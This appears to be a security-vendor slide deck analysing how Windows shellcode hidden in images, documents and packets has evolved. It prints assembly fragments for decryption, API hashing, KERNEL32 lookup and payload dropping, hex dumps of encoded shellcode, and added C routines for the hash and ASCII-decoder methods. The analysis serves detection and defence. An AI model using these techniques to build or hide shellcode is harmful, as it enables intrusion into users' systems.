Evolving Shellcode

Evolving Shellcode on Windows
Masaki Suenaga
Symantec Security Response Tokyo

(1) Shell code with vulnerability
(2) What shell code does
(3) Evolution history
(4) Future
[Timeline figure] Where shell code has been found: in the network packet (w/ Spybot!?), in a JPEG, in an Animation Cursor and in a Word Document. Dates on the timeline: September 2004, February 2005, March 2005.
Shell code in a network packet
Decrypts the code by XOR-ing with 99h.
Gets the base address of the already loaded KERNEL32.DLL.
Resolves the addresses of the necessary API entries.
Creates a socket.
Connects to the attacker's PC.
Calls CreateProcess with STARTUPINFO.hStdInput, hStdOutput and hStdError set to the socket.
Shell code in a JPEG file
Microsoft GDI+ Library JPEG Segment Length Integer Underflow vulnerability
[Figure: a web page reading "Welcome to this clean home page!" with JPEG images]
Just viewing a malicious web page can download and execute a malicious program.
Shell code in Word document
[Figure: an e-mail reading "Dear Sir, We will revise our wholesale prices. Please see the attached document for details. Sincerely Yours", with a Word document attached]
(2) What shell code does
1. Locating itself in memory
ADDRESS1: CALL ADDRESS3
ADDRESS2: some pieces of code
ADDRESS3: POP EBX
EBX points to ADDRESS2 (the return address pushed by the CALL). Then, for example:
LEA ESI, [EBX+14h]
2. Decrypting
ADDRESS1: MOV ECX,100
ADDRESS2: LEA ESI,[EBX+20]
ADDRESS3: MOV EDI,ESI
ADDRESS4: LODSB
ADDRESS5: XOR AL,99h
ADDRESS6: STOSB
ADDRESS7: LOOP ADDRESS4
Equivalent C:
for(c=0; c<100; c++)
{
    *lpData = *lpData ^ 0x99;
    lpData++;
}
XOR, ADD or SUB alone is often used.
3. Resolving API
ADDRESS1: MOV EAX, FS:[30h]    ;EAX = 7FFDF000h (PEB)
ADDRESS2: MOV EAX, [EAX+0Ch]   ;EAX = 00191EA0h (PEB.Ldr)
ADDRESS3: MOV ESI, [EAX+1Ch]   ;ESI = 00191F58h (Ldr.InInitializationOrderModuleList)
ADDRESS4: LODSD                ;EAX = 00192020h (next list entry)
ADDRESS5: MOV EBP, [EAX+8]     ;EBP = 77E60000h (DllBase: KERNEL32.DLL)
From this base address the shell code resolves LoadLibrary and GetProcAddress.
Refer to "Understanding Windows Shellcode" by skape.
3. Resolving API (2)
ADDRESS1:  XOR EBX, EBX
ADDRESS2:  MOV EAX, FS:[EBX]      ;EAX = 006FFE0h (head of the SEH chain)
ADDRESS3:  INC EAX
ADDRESS4:  XCHG EAX, EBX
ADDRESS5:  MOV EAX, [EBX-1]       ;EAX = 0FFFFFFFFh (next record; -1 marks the last one)
ADDRESS6:  INC EAX
ADDRESS7:  JNZ ADDRESS4
ADDRESS8:  MOV EDX, [EBX+3]       ;EDX = 77E94809h (handler of the last record, inside KERNEL32.DLL)
ADDRESS9:  XOR DX, DX
ADDRESS10: MOV AX, 1000h
ADDRESS11: CMP WORD PTR [EDX],'ZM'
ADDRESS12: JZ FOUND
ADDRESS13: SUB EDX, EAX
ADDRESS14: JMP ADDRESS11
FOUND:                           ;EDX = 77E60000h (KERNEL32.DLL)
GetProcAddress(hKernel32, "CreateFileExA")
4. Executing payload - downloading or dropping
How to find the host file handle (flow chart):
hFile = 0
GetFileSize(hFile) == 0x34D87?  YES: FOUND
otherwise hFile = hFile + 4 and check again
4. Executing payload - backdoor
[Figure: Internet Explorer, Image file, Backdoor]
(3) Evolution history
1. Decrypting shell
#include <windows.h>

void decrypt(DWORD *lpdwData)
{
    int pos;
    for(pos=0; ; pos++) {
        if(lpdwData[pos] == 0xFF773311)      /* end marker, stored in clear */
            break;
        if((lpdwData[pos] & 1) == 0){        /* key chosen by the low bit of the encrypted DWORD */
            lpdwData[pos] ^= 0x16D4A07;
        }
        else{
            lpdwData[pos] ^= 0x42BC4B2;
        }
    }
}
2. Checksum API resolving shell
(1) Checksum Method 1 (Right-Rotation 13 w/o null terminator, ADDing)
XOR EDI,EDI
XOR EAX,EAX
LOOP_NEXT:
LODSB
OR EAX,EAX
JZ END_LOOP
ROR EDI, 13
ADD EDI, EAX
JMP LOOP_NEXT
END_LOOP:
(2) Checksum Method 2 (Left-Rotation 7 w/o null terminator, XORing)
XOR EDI,EDI
XOR EAX,EAX
LOOP_NEXT:
LODSB
OR EAX,EAX
JZ END_LOOP
ROL EDI, 7
XOR EDI, EAX
JMP LOOP_NEXT
END_LOOP:
(3) Checksum Method 3 (Right-Rotation 13 w/ null terminator, ADDing)
XOR EDI,EDI
XOR EAX,EAX
LOOP_NEXT:
LODSB
ROR EDI, 13
OR EAX,EAX
JZ END_LOOP
ADD EDI, EAX
JMP LOOP_NEXT
END_LOOP:
(4) Checksum Method 4 (Left-Rotation 7 w/ null terminator, XORing)
XOR EDI,EDI
XOR EAX,EAX
LOOP_NEXT:
LODSB
ROL EDI, 7
OR EAX,EAX
JZ END_LOOP
XOR EDI, EAX
JMP LOOP_NEXT
END_LOOP:
FIG. 1-1  METHOD 1 and METHOD 3 (Right-rotation, ADDing): observed collisions per rotation count
Rotation count      1    2    3    4  5-7    8 9-11   12 13-15  16 17-19   20 21-23   24 25-27   28   29   30   31
kernel32.dll        7    0    0    0    0    0    0    0    0    1    0    0    0    0    0    0    0    0    0
urlmon.dll          0    0    0    0    0    0    0    0    0    0    0    0    0    0    0    0    0    0    0
ntdll.dll          10    0    0    0    0    0    0    0    0   13    0    0    0    0    0    0    1    0   20
advapi32.dll       20    2    0    0    0    2    0    0    0    7    0    0    0    0    0    0    6   26   47
user32.dll          0    0    0    1    0    1    0    1    0    5    0    1    0    1    0    1    0    0    0
wsock32.dll         1    0    0    0    0    0    0    0    0    2    0    0    0    0    0    0    0    0    0
ws2_32.dll          0    0    0    0    0    0    0    0    0    0    0    0    0    0    0    0    0    0    0
FIG. 1-2  METHOD 2 and METHOD 4 (Left-rotation, XORing): observed collisions per rotation count
Rotation count      1    2    3    4  5-7    8 9-11   12 13-15  16 17-19   20 21-23   24 25-27   28   29   30   31
kernel32.dll        4    0    0    0    0    0    0    0    0   24    0    0    0    0    0    0    0    0    0
urlmon.dll          0    0    0    0    0    0    0    0    0    0    0    0    0    0    0    0    0    0    0
ntdll.dll          11    0    0    0    0    0    0    0    0    7    0    0    0    0    0    0    0    0    8
advapi32.dll       44   25    5    0    0    2    0    0    0   22    0    0    0    2    0    0    0    1   21
user32.dll          2    0    0    1    0    1    0    1    0   12    0    1    0    1    0    1    0    0    0
wsock32.dll         1    0    0    0    0    0    0    0    0    2    0    0    0    0    0    0    0    0    1
ws2_32.dll          3    0    0    0    0    0    0    0    0    0    0    0    0    0    0    0    0    0    0
Colliding pairs behind the counts:
ClientToScreen and ScreenToClient (user32.dll)
SystemFunction001 and SystemFunction040 (advapi32.dll)
SystemFunction002 and SystemFunction041 (advapi32.dll)
Observed collisions in every multiple of 4
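The four checksum routines and the collision counts of FIG. 1-1 and FIG. 1-2, as an added C example that is not from the original slides. It implements each method with the rotation count as a parameter and checks the pairs the figures name: ClientToScreen/ScreenToClient collide under the XOR methods at every rotation count that is a multiple of 4 (their two six-letter blocks sit 8 bytes apart, and 8 times a multiple of 4 is a whole number of 32-bit rotations, so XOR cancels them), and SystemFunction001/040 collide under the ADD methods at rotation 2; the reasoning in the comments is this example's own.

```c
#include <stdint.h>

/* 32-bit rotations; the count is taken modulo 32, as x86 ROR/ROL do. */
uint32_t ror32(uint32_t v, unsigned r) { r &= 31; return r ? (v >> r) | (v << (32 - r)) : v; }
uint32_t rol32(uint32_t v, unsigned r) { r &= 31; return r ? (v << r) | (v >> (32 - r)) : v; }

/* Method 1: ROR r, then ADD, for every byte before the null terminator. */
uint32_t hash_ror_add(const char *name, unsigned r) {
    uint32_t h = 0;
    for (const unsigned char *p = (const unsigned char *)name; *p; p++)
        h = ror32(h, r) + *p;
    return h;
}

/* Method 2: ROL r, then XOR, for every byte before the null terminator. */
uint32_t hash_rol_xor(const char *name, unsigned r) {
    uint32_t h = 0;
    for (const unsigned char *p = (const unsigned char *)name; *p; p++)
        h = rol32(h, r) ^ *p;
    return h;
}

/* Methods 3 and 4 rotate before testing for the terminator, so the null byte
   rotates the hash one more time but contributes nothing to the ADD/XOR. */
uint32_t hash_ror_add_null(const char *name, unsigned r) {
    uint32_t h = 0;
    for (const unsigned char *p = (const unsigned char *)name;; p++) {
        h = ror32(h, r);
        if (!*p) return h;
        h += *p;
    }
}
uint32_t hash_rol_xor_null(const char *name, unsigned r) {
    uint32_t h = 0;
    for (const unsigned char *p = (const unsigned char *)name;; p++) {
        h = rol32(h, r);
        if (!*p) return h;
        h ^= *p;
    }
}

typedef uint32_t (*hash_fn)(const char *, unsigned);

/* Bit r (1..31) is set when the two names get the same checksum with rotation
   count r, i.e. when a resolver keyed on that checksum cannot tell them apart. */
uint32_t colliding_rotations(hash_fn fn, const char *a, const char *b) {
    uint32_t mask = 0;
    for (unsigned r = 1; r < 32; r++)
        if (fn(a, r) == fn(b, r)) mask |= 1u << r;
    return mask;
}
```

Methods 3 and 4 give the same collisions as 1 and 2 because their result is just the Method 1/2 value rotated once more, which is why the figures group them in pairs.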
3. Code obfuscating shell
Where is ebx + 40112Dh?
push 1
lea ecx, [ebx+40112Dh] ; file name?
nop
push ecx
push edx
call dword ptr [ebx+401191h] ; API?
ADDR0001DF4E call ADDR0001DF53
ADDR0001DF53 pop ebx
ADDR0001DF54 sub ebx, 4010A6h          ; ebx = -3e3153h (1DF53h - 4010A6h)
ADDR0001DF5A jmp loc_1E068
ADDR0001DF5F ;some pieces of code
loc_1E068:
;some pieces of code
ADDR0001E097 mov [ebx+401185h], ebx    ; [ADDR0001E032] = EBX
ADDR0001E09D lea edx, [ebx+4010B2h]    ; EDX = offset ADDR0001DF5F
;some pieces of code
ADDR0001E0F4 mov ebx, [edx+0D3h]       ; ebx = (-3e3153h) ; 1DF5Fh+0D3h = 1E032h
[ebx+401191h] is CopyFileA
5. Host modifying shell
Miracle cure...? No, alas, it is too late to save you.
push 0                      ; FILE_BEGIN
push 0
mov  eax, [ebp-4Ch]         ; offset dropped_binary
push eax
mov  eax, [ebp-50h]         ; hFileDocument
push eax
call dword ptr [esi+0Ch]    ; SetFilePointer
push 40000h
push 40h
call dword ptr [esi+20h]    ; GlobalAlloc
mov  [ebp-4], eax           ; lpMem
push 0                      ; lpOverlapped
lea  eax, [ebp-58h]         ; nNumberOfBytesWritten
push eax
mov  eax, [ebp-48h]         ; 24B87h (size of dropped file)
push eax
push dword ptr [ebp-4]      ; lpMem
push dword ptr [ebp-50h]    ; hFileDocument
call dword ptr [esi+8]      ; WriteFile

In C:
SetFilePointer(hFile, lpDroppedFile, 0, 0);
lpMem = GlobalAlloc(0x40, 0x40000);
WriteFile(hFileDocument, lpMem, 0x24B87, &cbWritten, 0);
6. ASCII shell
Where have they gone?
Hex values                                        ASCII characters
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
90 90 6A 7F 59 D9 EE D9 74 24 F4 5B 81 73 13 80   ..j.Y...t$.[.s..
82 01 01 83 EB FC E2 F4 7C B1 DA B2 B0 E6 8A 02   ........|.......
05 42 79 0D 0B C2 0D 8A F0 9E AC 8A E8 8A EA 08   .By.............
FIG. 2 (hex dump, 16 bytes per line, with the ASCII column on the right)
43 37 4B 97 99 9F 99 90 F9 FD 43 46 99 4F 4E 4A   C7K.......CF.ONJ
91 4A 96 27 98 F5 F9 37 47 93 96 3F FC 27 47 99   .J.'...7G..?.'G.
98 48 FC 47 F9 27 FC 3F 48 90 46 3F F9 43 2F 40   .H.G.'.?H.F?.C/@
42 9F 91 48 47 F8 43 4A F5 3F 49 48 97 4F 9F 4B   B..HG.CJ.?IH.O.K
F8 92 EB 03 59 EB 05 E8 F8 FF FF FF 49 49 49 49   ....Y.......IIII
49 49 49 49 49 48 49 49 49 49 49 49 49 49 51 5A   IIIIIHIIIIIIIIQZ
6A 43 58 50 30 41 31 41 42 6B 42 41 53 42 32 42   jCXP0A1ABkBASB2B
41 32 41 41 30 41 41 58 50 38 42 42 75 4A 49 6A   A2AA0AAXP8BBuJIj
4B 32 30 30 5A 32 6A 46 53 78 49 30 66 4E 59 57   K200Z2jFSxI0fNYW
4C 66 61 4B 30 47 44 34 4A 4D 49 6D 32 7A 5A 6A   LfaK0GD4JMIm2zZj
4B 63 35 6B 58 6A 4B 6B 4F 6B 4F 79 6F 74 30 30   Kc5kXjKkOkOyot00
4C 7A 39 4F 69 6C 59 5A 63 49 6D 70 38 6C 69 6D   Lz9OilYZcImp8lim
Just an ASCII text
The first bytes of FIG. 2, disassembled:
43  inc ebx
37  aaa
4B  dec ebx
97  xchg eax, edi
99  cdq
9F  lahf
99  cdq
90  nop
F9  stc
FD  std
43  inc ebx
F8 92 EB 03 59 EB 05 E8 F8 FF FF FF 49 49 49 49   ....Y.......IIII
49 49 49 49 49 48 49 49 49 49 49 49 49 49 51 5A   IIIIIHIIIIIIIIQZ
00000ADC 49           dec ecx
00000ADD 49           dec ecx                   ; ecx = 0xABB
00000ADE 51           push ecx
00000ADF 5A           pop edx                   ; edx = 0xABB
00000AE0 6A 43        push 43h
00000AE2 58           pop eax                   ; eax = 0x43
00000AE3 50           push eax
00000AE4 30 41 31     xor [ecx+31h], al         ; XOR byte ptr [0xAEC],43h
00000AE7 41           inc ecx                   ; ecx = 0xABC
00000AE8 42           inc edx                   ; edx = 0xABC
00000AE9 6B 42 41 53  imul eax, [edx+41h], 53h  ; 53h (the imm8 at 0xAEC) was modified to 10h:
                                                ; imul eax,[edx+41h],10h, i.e. [0xAFD] * 10h
                                                ; AL=0xA0
00000AED 42           inc edx                   ; edx = 0xABD
00000AEE 32 42 41     xor al, [edx+41h]         ; AL = 0xA0 XOR 0x49 (== 0xE9)
00000AF1 32 41 41     xor al, [ecx+41h]         ; AL = 0xE9 XOR 0x4A (== 0xA3)
00000AF4 30 41 41     xor [ecx+41h], al         ; [0xAFD] = 0x4A XOR 0xA3 (== 0xE9)
00000AF7 58           pop eax                   ; eax = 0x43
00000AF8 50           push eax
00000AF9 38 42 42     cmp [edx+42h], al         ; cmp 0x49,0x43
00000AFC 75 4A        jnz loc_0B48              ; 4Ah was modified to 0E9h
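The decoding loop on this slide, as an added C example that is not part of the original presentation. It reproduces the per-pair arithmetic (AL = [edx+41h] * 10h, then XOR with the byte after it) on a constructed sample that begins with the 4A 49 pair at 0AFDh, whose result 0E9h is the byte that overwrites the JNZ displacement, and checks the premise of the slide: the encoded form is entirely printable ASCII while the decoded bytes are not. The 43h end marker is the value the slide compares in AL; the two extra pairs in the sample are this example's own.

```c
#include <stdint.h>
#include <stddef.h>
#include <ctype.h>

/* One pair, as the loop on the slide computes it: AL = low byte of
   ([edx+41h] * 10h), then AL ^= the byte after it. The XOR against
   [ecx+41h] and the XOR-store back into [ecx+41h] cancel each other,
   so the net effect is a plain store of AL over the first encoded byte. */
uint8_t ascii_pair_decode(uint8_t first, uint8_t second) {
    return (uint8_t)(((first << 4) ^ second) & 0xFF);
}

/* In-place decoding of an ASCII-encoded buffer. The output pointer (ecx on
   the slide) advances one byte per iteration and the input pointer (edx)
   two, so decoded bytes never overtake unread input. Decoding stops when the
   next input byte equals end_marker, the byte the CMP at 0AF9h compares with
   AL (43h in the dump). Returns the number of decoded bytes. */
size_t ascii_shell_decode(uint8_t *buf, size_t len, uint8_t end_marker) {
    size_t in = 0, out = 0;
    while (in + 1 < len && buf[in] != end_marker) {
        buf[out++] = ascii_pair_decode(buf[in], buf[in + 1]);
        in += 2;
    }
    return out;
}

/* 1 when every byte is printable 7-bit ASCII, which is what lets the encoded
   form pass as "just an ASCII text" in a file or a packet. */
int all_printable_ascii(const uint8_t *p, size_t n) {
    for (size_t i = 0; i < n; i++)
        if (p[i] > 0x7E || !isprint(p[i])) return 0;
    return 1;
}

/* Constructed sample: the pair 4A 49 taken from 0AFDh on the slide, two more
   pairs chosen for this example, then the 43h end marker. Decodes to E9 31 C0. */
uint8_t sample[] = { 0x4A, 0x49, 0x47, 0x41, 0x4F, 0x30, 0x43 };
const size_t sample_len = sizeof sample;
```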
FIG. 3 (hex dump, 16 bytes per line, with the ASCII column on the right)
10E0  4A 43 4F 48 93 91 F9 F9 F8 4F 98 90 37 D6 F9 D6   JCOH.....O..7...
10F0  4E 93 92 90 43 96 47 4B 91 48 96 FC 42 40 D6 91   N...C.GK.H..B@..
1100  F8 F8 FD 97 4E 9B 41 F8 46 FC 93 FC 3F 48 46 F5   ....N.A.F...?HF.
1110  37 40 49 99 F5 F8 F8 42 4B FD 96 46 47 FD 37 90   7@I....BK..FG.7.
1120  48 91 90 37 4F 37 FC 2F D6 49 4A 4E FC FD FC 90   H..7O7./.IJN....
1130  27 FC 6A 3C 59 D9 EE D9 74 24 F4 5B 81 73 13 C4   '.j<Y...t$.[.s..
1140  91 F6 B1 83 EB FC E2 F4 2F C5 7D C4 F8 1A 82 84   ......../.}.....
1150  BC 92 03 E7 4F E7 D6 B2 31 A2 3F F8 85 3C C5 6A   ....O...1.?..<.j
1160  F2 9E 48 A5 EC A9 04 C5 CC 50 3D BC C7 4B B6 5A   ..H......P=..K.Z
Looks like a part of WMF file…
7. DBCS-to-Unicode conversion shell
GB-2312 bytes:
CE B7 C0 C5 C6 DF B4 D9 DF 5F 95 84
Disassembled as they are:
INTO
MOV BH, 0C0h
DB 0C5h
MOV BH, 0B4h
FSTP ST(7)
POP EDI
XCHG EAX,EBP
TEST CL, CH
The same bytes after conversion to Unicode:
4F 75  05 74  03 4E  C3 4F  54 90 5E 66
* DBCS = Double Byte Character Set
In Unicode:
DEC EDI
JNZ LABEL1
JZ LABEL1
DEC ESI
RETN
DB 4Fh
LABEL1:
PUSH ESP
NOP
POP ESI
LODSW
(4) Future
1. Large host file
2. With a special weapon
2-1. MMX instruction using shell
2-2. Packed shell
2-3. Location limiting shell
3. Hard to kill
4. Hiding
5. Many eggs
6. Various variants
7. Parasite
7-1. Injecting shell
7-2. File infecting shell
[Figure with the labels HELP, JPEG, JPEG, EXE]
8. Living in a niche
8-1. Environment-dependent shell
9. Mimic
[Figure: a file mixing pieces of plain text ("Hello,", "This is a Clean file", "Welcome", "If you have any Question, please") with the first shell code, the next shell code encoded by XOR, and binary data]
Looks as if a corrupted file…
If it is large and with a lot of dummy binary data…
CONCLUSION
Traditionally, data files are not supposed to
contain program code. Shell code has been
evolving month after month, but it cannot
elude us as long as we can locate
the initial point of execution.
We can be optimistic in this sense.
At the same time, we have to pay attention
to the way shell code behaves; otherwise
it may go far beyond our current assumptions.